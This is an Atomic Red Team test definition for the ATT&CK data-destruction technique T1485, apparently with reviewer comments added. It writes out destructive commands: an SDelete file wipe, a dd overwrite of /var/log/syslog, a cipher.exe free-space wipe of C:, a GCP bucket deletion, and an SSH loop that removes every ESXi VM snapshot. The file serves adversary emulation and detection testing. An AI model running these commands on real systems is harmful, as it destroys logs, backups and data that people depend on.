4ea1e37fc1
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
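# Atomic Red Team technique definition for ATT&CK T1485 (Data Destruction).
# `#{name}` tokens are input-argument placeholders the framework substitutes into
# the commands before running them; `PathToAtomicsFolder` is expanded by the runner.
attack_technique: T1485
display_name: Data Destruction
atomic_tests:
  # Test 1: overwrite-then-delete a single file with SysInternals SDelete.
  - name: Windows - Overwrite file with SysInternals SDelete
    auto_generated_guid: 476419b5-aebf-4366-a131-ae3e8dae5fc2
    description: |
      Overwrites and deletes a file using SysInternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
      the powershell session along with other information about the file that was deleted.
    supported_platforms:
      - windows
    input_arguments:
      sdelete_exe:
        description: Path of sdelete executable
        type: path
        # Single quotes keep the backslashes literal (same style as plink_file below).
        default: 'PathToAtomicsFolder\..\ExternalPayloads\Sdelete\sdelete.exe'
      file_to_delete:
        description: Path of file to delete
        type: path
        default: 'PathToAtomicsFolder\..\ExternalPayloads\T1485.txt'
    dependency_executor_name: powershell
    dependencies:
      - description: |
          Secure delete tool from SysInternals must exist on disk at specified location (#{sdelete_exe})
        prereq_command: |
          if (Test-Path "#{sdelete_exe}") {exit 0} else {exit 1}
        # Fetches SDelete.zip over HTTPS and unpacks it; the archive is not
        # integrity-checked against a known hash before it is expanded and executed.
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
          Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip"
          Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip" "PathToAtomicsFolder\..\ExternalPayloads\Sdelete" -Force
          Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip" -Force
    executor:
      # Creates the target file first if it is missing, so the run always has a file to wipe.
      command: |
        if (-not (Test-Path "#{file_to_delete}")) { New-Item "#{file_to_delete}" -Force }
        & "#{sdelete_exe}" -accepteula "#{file_to_delete}"
      name: powershell

  # Test 2: overwrite a file in place with dd, using the file's own byte length.
  - name: FreeBSD/macOS/Linux - Overwrite file with DD
    auto_generated_guid: 38deee99-fd65-4031-bec8-bfa4f9f26146
    # NOTE(review): the executor command only overwrites; nothing removes the file
    # afterwards, so "deletes" here and "remove" in file_to_overwrite overstate what runs.
    # With a byte count the command also terminates on its own, so the CTRL/CMD+C line
    # looks stale — confirm before dropping it.
    description: |
      Overwrites and deletes a file using DD.
      To stop the test, break the command with CTRL/CMD+C.
    supported_platforms:
      - linux
      - macos
    input_arguments:
      overwrite_source:
        description: Path of data source to overwrite with
        type: path
        default: /dev/zero
      file_to_overwrite:
        description: Path of file to overwrite and remove
        type: path
        # Linux path (the live system log); it is overwritten in place. Point it at an
        # existing file on macOS/FreeBSD.
        default: /var/log/syslog
    executor:
      # `bs=1` with a byte count is understood by both GNU and BSD dd, so the overwrite
      # stays exactly the file's current length on macOS/FreeBSD as well
      # (`iflag=count_bytes` is GNU-only and fails on BSD dd). Byte-sized blocks are
      # slow on large files. Both paths are quoted so whitespace cannot split the command.
      command: |
        dd of="#{file_to_overwrite}" if="#{overwrite_source}" bs=1 count=$(ls -l "#{file_to_overwrite}" | awk '{print $5}')
      name: sh

  # Test 3: wipe the free space of the C: volume with the built-in cipher.exe.
  - name: Overwrite deleted data on C drive
    auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19
    description: |
      RansomEXX malware removes all deleted files using windows built-in cipher.exe to prevent forensic recover.
      This process is very slow and test execution may timeout.
      https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware
      https://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4
    supported_platforms:
      - windows
    executor:
      # /w:<dir> overwrites the unallocated space of the volume that holds <dir>;
      # allocated (live) files are not touched.
      command: |
        cipher.exe /w:C:
      name: command_prompt

  # Test 4: delete a GCS bucket that terraform (see dependencies) created beforehand.
  - name: GCP - Delete Bucket
    auto_generated_guid: 4ac71389-40f4-448a-b73f-754346b3f928
    description: |
      This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team.

      Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations.
      This atomic will create a bucket then delete the bucket.

      Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
    supported_platforms:
      - iaas:gcp
    input_arguments:
      project_id:
        description: ID of the GCP Project you to execute the command against.
        type: string
        default: atomic-test-1
      bucket_name:
        description: The name of the bucket to delete.
        type: string
        # Presumably has to match the bucket name in the terraform config under
        # src/T1485-4 — confirm against that config.
        default: atomic-red-team-bucket
    executor:
      name: sh
      elevation_required: false
      # `gcloud config set project` changes the active project of the caller's gcloud
      # configuration, not just for this run; it is not reset by cleanup_command.
      command: |
        gcloud config set project #{project_id}
        gcloud storage buckets delete gs://#{bucket_name}
      # The bucket is already gone when cleanup runs; presumably `state rm` keeps
      # `destroy` from failing on the missing resource — confirm.
      cleanup_command: |
        cd "$PathToAtomicsFolder/T1485/src/T1485-4/"
        terraform state rm google_storage_bucket.bucket
        terraform destroy -auto-approve
    dependency_executor_name: sh
    dependencies:
      - description: |
          Requires gcloud
        prereq_command: |
          if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
        get_prereq_command: |
          echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
      - description: |
          Check if user is logged in
        prereq_command: |
          gcloud config get-value account
        get_prereq_command: |
          gcloud auth login --no-launch-browser
      - description: |
          Check if terraform is installed.
        prereq_command: |
          terraform version
        get_prereq_command: |
          echo Please install the terraform.
      - description: |
          Create dependency resources using terraform
        # Treats the presence of a tfstate file as "the resources already exist".
        prereq_command: |
          stat "$PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate"
        get_prereq_command: |
          cd "$PathToAtomicsFolder/T1485/src/T1485-4/"
          terraform init
          terraform apply -auto-approve

  # Test 5: from a Windows host, ssh into an ESXi server with plink and remove every VM snapshot.
  - name: ESXi - Delete VM Snapshots
    auto_generated_guid: 1207ddff-f25b-41b3-aa0e-7c26d2b546d1
    description: |
      Deletes all snapshots for all Virtual Machines on an ESXi Host
      [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery)
    supported_platforms:
      - windows
    input_arguments:
      vm_host:
        description: Specify the host name or IP of the ESXi server.
        type: string
        default: atomic.local
      vm_user:
        description: Specify the privilege user account on the ESXi server.
        type: string
        default: root
      vm_pass:
        description: Specify the privileged user's password.
        type: string
        # Placeholder only. The value is handed to plink as a command-line argument
        # (see executor), so it shows up in process listings and command-line logging.
        default: password
      plink_file:
        description: Path to Plink
        type: path
        default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
    dependency_executor_name: powershell
    dependencies:
      - description: |
          Check if we have plink
        prereq_command: |
          if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
        # Downloads whatever the "latest" plink build is; no version pin and no hash check.
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
    executor:
      # `-batch` disables plink's interactive prompts; the piped empty line supplies stdin
      # (presumably so nothing waits for input — confirm). The remote loop lists every
      # VM id with vim-cmd and removes all snapshots of each one.
      command: |
        echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/snapshot.removeall $i & done"
      name: command_prompt
      elevation_required: false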